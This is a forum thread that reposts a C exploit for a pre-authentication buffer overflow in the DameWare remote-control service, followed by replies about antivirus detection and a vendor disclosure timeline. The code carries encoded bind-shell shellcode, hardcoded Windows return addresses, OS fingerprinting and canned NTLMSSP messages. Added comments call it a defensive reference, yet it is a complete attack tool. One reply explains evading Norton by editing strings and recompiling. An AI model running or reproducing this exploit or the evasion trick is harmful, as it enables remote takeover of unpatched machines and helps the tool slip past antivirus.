Full Version: Dwmrcexp.c
101

0day released by wirepair


#ifdef _WIN32
#include <winsock.h>
#include <windows.h>
#else
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#endif
#include <string.h>
#include <stdio.h>

#ifdef _WIN32
#else
/* The Win32 DWORD is a 32-bit unsigned integer; `unsigned long` matches that
 * only on ILP32/LLP64 targets and is 8 bytes on LP64 Unix. The memcpy()
 * calls in main() copy only the first 4 bytes of these values, so the
 * substitute is endian- and ABI-dependent rather than portable. */
#define DWORD unsigned long
#endif
/* Target endpoint; filled from argv[1] and the fixed port in main().
 * Global scope is not needed by anything else in the file. */
struct sockaddr_in serv;
/*
 * Historical proof-of-concept (2003; see the disclosure timeline further
 * down the page) for a pre-authentication overflow in the DameWare
 * remote-control service (dwmrc) listening on TCP 6129. Kept as a
 * defensive reference: the exchange below (server greeting echoed back
 * with three bytes changed, one fixed 4096-byte request, then canned
 * NTLMSSP type-1/type-3 messages) is the traffic pattern a network sensor
 * would flag, and the vendor hotfix named in the page's timeline is the
 * mitigation. The thread also notes that AV engines signature the embedded
 * payload bytes.
 *
 * Code-review notes on the tool itself; the code is left exactly as posted:
 *  - exit()/atoi() are used without <stdlib.h>, close() without <unistd.h>.
 *  - connect()/recv()/send() results are never checked, so a refused
 *    connection or a short read is parsed from whatever recvbuf holds.
 *  - `sp` is assigned only when an 'S' byte is found and is otherwise read
 *    uninitialized by the switch below (undefined behaviour).
 *  - both `for (i = 0; i <= x; i++)` loops index one byte past the data.
 *  - `*(long*)lport` type-puns a char[4]: a strict-aliasing violation and
 *    an over-read where sizeof(long) == 8.
 *
 * @param argc  expects 3: program name, target host (dotted IPv4), bind port.
 * @param argv  argv[1] host, argv[2] port (parsed with atoi(), unchecked).
 * @return 0 after the exchange; exit(1) on usage or fingerprint failure.
 */
int main(int argc, char **argv) {
       #ifdef _WIN32
       WSADATA wsa;
       #endif
       int s;
       // Per-target constants; the fingerprint below picks one and copies it over sc[0..3].
       DWORD xpsp0 = 0x77e9fc79; // kernel32 probably should be changed...
       DWORD xpsp1 = 0x77E9AE59; // kernel32 probably should be changed...
       DWORD sp1 = 0x74fd41b3; // msafd.dll works with sp1 base, haven't verified patches.
       DWORD sp2 = 0x74fd1b4b; // msafd.dll works with sp2 base, haven't verified patches.
       DWORD sp3 = 0x74fd2d57; // msafd.dll works with sp3 base and sp3 fully patched.
       DWORD sp4 = 0x74fdee63; // msafd.dll works with sp4 base and sp4 fully patched.
       unsigned short lportl = 666;
       int sp, x,i;            // sp: service pack number; x: last recv() length; i: loop index
       int winvers;            // 0 = Windows 2000, 1 = XP, 2 = unknown (set from reply bytes 8/12)
       char recvbuf[10000];    // filled by recv(); indexed at fixed offsets without length checks
       char sendbuf[4096];     // the single fixed-size request built below
       int nosp = 0;           // set when a byte other than 'S' is seen during the SP scan
       char userl[] = "ssh0dan.org";
       char userr[] = "Administrator1";
       char nbname[] = "SH0DAN";
       char nbnamel[] = "sh0dan";
       char company[] = "ZOOPTARD";
       char reger[] = "HAHAHA";
       char stuff[] = "55274-644-2791234-23134";
       char date[] = "11/22/03 17:09:54";
       char ip[] = "192.168.1.249,192.168.43.1,192.168.0.1";
       char vers[] = "3.72.0.3";
       char wtf[] = "\x20\x00\x00\x00";   // 4 bytes sent between the request and the NTLMSSP messages; not named by the author
       // Canned NTLMSSP type-1 (negotiate) message: "NTLMSSP\0" followed by message type 1.
       char rest1[] =
               "\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\xb7\x82\x08\xe0"
               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
               "\xa8\x00\x00\x00";
       // Canned NTLMSSP type-3 (authenticate) message: "NTLMSSP\0", type 3, fixed
       // precomputed fields (UTF-16LE user/host strings visible below). It is sent
       // unmodified; nothing from the server's replies is folded into it.
       char rest2[] =
               "\x4e\x54\x4c\x4d\x53\x53\x50\x00\x03\x00\x00\x00\x18\x00\x18\x00"
               "\x68\x00\x00\x00\x18\x00\x18\x00\x80\x00\x00\x00\x00\x00\x00\x00"
               "\x40\x00\x00\x00\x1c\x00\x1c\x00\x40\x00\x00\x00\x0c\x00\x0c\x00"
               "\x5c\x00\x00\x00\x10\x00\x10\x00\x98\x00\x00\x00\x35\x82\x88\xe0"
               "\x61\x00\x64\x00\x6d\x00\x69\x00\x6e\x00\x69\x00\x73\x00\x74\x00"
               "\x72\x00\x61\x00\x74\x00\x6f\x00\x72\x00\x31\x00\x5a\x00\x49\x00"
               "\x4e\x00\x47\x00\x2d\x00\x32\x00\x07\x4b\x9d\xd8\x93\x3f\xaf\x70"
               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
               "\xd1\x9e\x0a\x37\xd4\x71\x24\xfb\x17\x61\x01\x76\x52\x35\xcd\x80"
               "\xba\xab\xd6\x81\x0b\xe2\x96\x87\x6e\x86\xc4\xa4\xc0\x11\x5e\x31"
               "\x87\x97\xb6\x80\xd7\xc4\xe7\x4d";

       char lport[] = "\x00\xFF\xFF\x8b";   // bytes 1-2 are overwritten with the requested port below
       // Payload buffer; bytes 0-3 and 264-267 are patched in place before it is sent.
       char sc[] =
               "\xbb\xed\x4f\x7c" // ret
               "\x90\x90\x90\x90"
               "\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
               "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
               "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
               "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
               "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
               "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
               "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
           "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
           "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
           "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
           "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
           "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
           "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
           "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
           "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
           "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
           "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
           "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
           "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
           "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
           "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
           "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
           "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
           "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
           "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
           "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
           "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
           "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
           "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
           "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
           "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
           "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";



       // Usage check; exit() and atoi() below need <stdlib.h>, which is not included.
       if(argc < 3) {
               fprintf(stderr, "Usage: %s <host> <bind shellport>\n", argv[0]);
               exit(1);
       }

       lportl = atoi(argv[2]);   // no range check; atoi() yields 0 on non-numeric input
       lportl=htons(lportl);
       memcpy(&lport[1], &lportl, 2);
       // UB: aliases a char[4] as long; also reads/writes past the array where sizeof(long) == 8.
       *(long*)lport = *(long*)lport ^ 0x9432BF80;
       memcpy(&sc[264],&lport,4);
       #ifdef _WIN32
       WSAStartup(MAKEWORD(1,0),&wsa);   // return value unchecked
       #endif
       serv.sin_addr.s_addr = inet_addr(argv[1]);   // INADDR_NONE on a malformed address is not detected
       serv.sin_port = htons(6129);                 // the service port this tool talks to
       serv.sin_family = AF_INET;

       s = socket(AF_INET, SOCK_STREAM, 0);   // -1 on failure is not checked

       // Unchecked: a refused connection still falls through into the parsing below.
       connect(s, (struct sockaddr *)&serv, sizeof(struct sockaddr));
       x = recv(s, recvbuf, sizeof(recvbuf), 0);   // x may be -1 or short; bytes 26/30/36 are written regardless
       // Echo the server's greeting back with three bytes changed (first step of the pre-auth handshake). //
       recvbuf[26] = 0x00;
       recvbuf[30] = 0x00;
       recvbuf[36] = 0x01;
       send(s, recvbuf, 40, 0);   // always 40 bytes, even if fewer were received
       x = recv(s, recvbuf, sizeof(recvbuf), 0);

       /* start identifying os */
       // OS fingerprint from bytes 8 and 12 of the second reply: 1 = XP, 0 = 2000, 2 = unknown.
 if (recvbuf[8]==5 && recvbuf[12]==1) {
           winvers = 1;
 } else if (recvbuf[8]==5 && recvbuf[12]==0) {
  winvers = 0;
 } else {
  winvers = 2;
 }
       // Scan for the first 'S'; the service pack is then parsed from fixed
       // offset 37 (the commented-out line used i+13). `i <= x` reads one byte
       // past the received length, and sp stays uninitialized if no 'S' is seen.
       for (i = 0; i <= x; i++) {
               if(recvbuf[i] == 'S') {
                       //sp = atoi(recvbuf+i+13);
                       sp = atoi(&recvbuf[37]);
     break;
               } else {
                       nosp = 1;
               }
       }
       if (winvers == 0) {
               // Windows 2000: select the per-service-pack constant, or bail out.
               switch (sp) {
               case 1:
                       memcpy(sc, &sp1, 4);
                       printf("Host is running Windows 2000 SP: %d\n", sp);
                       break;
               case 2:
                       memcpy(sc, &sp2, 4);
                       printf("Host is running Windows 2000 SP: %d\n", sp);
                       break;
               case 3:
                       memcpy(sc, &sp3, 4);
                       printf("Host is running Windows 2000 SP: %d\n", sp);
                       break;
               case 4:
                       memcpy(sc, &sp4, 4);
                       printf("Host is running Windows 2000 SP: %d\n", sp);
                       break;
               default:
                       fprintf(stderr, "Error finding service pack inspect manually... Exiting\n");
                       // The only exit path that closes the socket; the others leave it to the OS.
                       #ifdef _WIN32
                       closesocket(s);
                       #else
                       close(s);
                       #endif
                       exit(1);
               }
       } else if( winvers == 1) {

               // XP: only the SP0 (nosp) and SP1 cases are handled; any other
               // value matches neither branch and execution continues with sc unpatched.
               if(nosp == 1) {
                       printf("Host is running Windows XP SP: 0\n");
                       memcpy(sc, &xpsp0, 4);
               } else if (sp == 1) {
                       printf("Host is running Windows XP SP: %d\n", sp);
                       memcpy(sc, &xpsp1, 4);
               }
       } else {
               fprintf(stderr, "Unknown OS sorry Exiting...\n");
               exit(1);
       }
       /* end identifying os */

       // Request header: byte 0 = 0x10, byte 1 = 0x27 (the author's "size" note), rest zero.
       memset(sendbuf, 0x00, sizeof(sendbuf));
       memset(sendbuf, 0x10, 1);
       memset(sendbuf+1, 0x27, 1);                     // size

       // Field offsets (196, 2796, 3056, 3836) come from the author's protocol analysis.
       // Note the mix: sizeof() copies include the terminating NUL, strlen() advances do not.
       x = 196;          // first offset for local username
       memcpy(sendbuf+x, userl, sizeof(userl));
       x += strlen(userl);
       memset(sendbuf+x, 0x42, 309);     // bunch of garbage that gets stripped anyways.
       x+=309;
       memcpy(sendbuf+x, sc, sizeof(sc));    // after this we're basically overwriting every other string so no point heh.
                                                       // i'm still pretty certain you need to finish up the entire pre-auth communication.
                                                       // seeing as how the function doesn't return until after the auth fails heh.
       x = 2796;
       memcpy(sendbuf+x, nbnamel, strlen(nbnamel));
       x = 3056;
       memcpy(sendbuf+x, ip, strlen(ip));
       x = 3836;
       memcpy(sendbuf+x, vers, strlen(vers));
       send(s, sendbuf, sizeof(sendbuf), 0);   // the whole 4096-byte buffer, return value unchecked
       x = recv(s, recvbuf, sizeof(recvbuf), 0);

       /* send wtf */
       send(s, wtf, 4, 0);
       /* send rest */

       send(s, rest1, sizeof(rest1), 0);   // sizeof includes the trailing NUL of the array
       x = recv(s, recvbuf, sizeof(recvbuf), 0);

       send(s, rest2, sizeof(rest2), 0);
       x = recv(s, recvbuf, sizeof(recvbuf), 0);
       printf("End Data (Includes NetBIOS Name:\n");
       // Dumps the raw reply to the terminal unescaped, again one byte past x.
       for (i = 0; i <= x; i++) {
               printf("%c", recvbuf[i]);
       }


       return(0);
}

DJVASTVASTY2K
Hello M8's

Just Trying To Save Your Computers

Do Not Download This>>>>>>>>

>>>>>This Contains WIN32 BLASTER virus<<<<<

Nortons 2004 Pro

Detected Virus [WIN32 BLASTER]

Best Regards

Adam

Vast Gsm
101


Another one who uses Norton shit...

recycle your antivirus man seriously ...
boshcash
Well, the original file is at: http://sh0dan.org/files/dwmrcexp.c — go get it and compile it.
clip
looks nice .. thanks.

ps. this is for the dameware hole.
tazthedev
I have my Norton up to date, and the executable isn't seen as a virus by Norton... I have Norton 2003.
320X
Norton Antivirus is bullshit compile the version of the 0 days with the vc++
thatsmej
Norton 2004 here also says that it's an MSBlaster worm...

So I guess it looks at some known code sequences which are the same, or so.
TedOb1
I compiled it from the 'original' code off the site with gcc. Norton (corp. ed.) picked it up as Blaster as soon as it compiled. To compile this I needed to turn off realtime protection and store it in a dir I have excluded from Norton's search. Just because it detects anything that uses a Blaster-type string as Blaster doesn't mean Norton sucks... I want it to detect anything even remotely dangerous on my network and don't mind taking the extra steps.

thanks for the code 101
101
That's wirepair to thank, Ted; I did nothing except bring it here quickly for testing.
About Norton yeah you can all forget it , I already made some tests , there are a long time so but ..
I was using some old exploit detected by Norton. I edited lame sentences, words like "Exploits" "Target Succesfully exploited" etc.. etc..
After a "re"compilation , it was no more detected .....

This let j00 see how norton can detect evrything as nothing smile.gif

nb: i know, crap english, sorry .. & l8r.

//EDIT: If you wanna test , took hk.exe , should be still detect by norton, edit it like i said & recompile it. The tool will be safe smile.gif
flame
It's just the shellcode that's being spotted as Blaster — that's a well-known FACT.
TedOb1
With the patch already released you can hardly call it a 0day, though. Maybe 1day or 6day!?

Time Table:
Nov 21st, Vulnerability identified and Exploit written.
Nov 23rd, First contact with DameWare
Nov 24th, Response by DameWare stating they will inspect the issue.
Nov 26th, DameWare supplied me a hotfix to re-test.
Dec 4th, DameWare put the hotfix (new version) online for clients to download.
Dec 14th, This advisory is released.
Dec 20th, I plan on releasing my exploit code.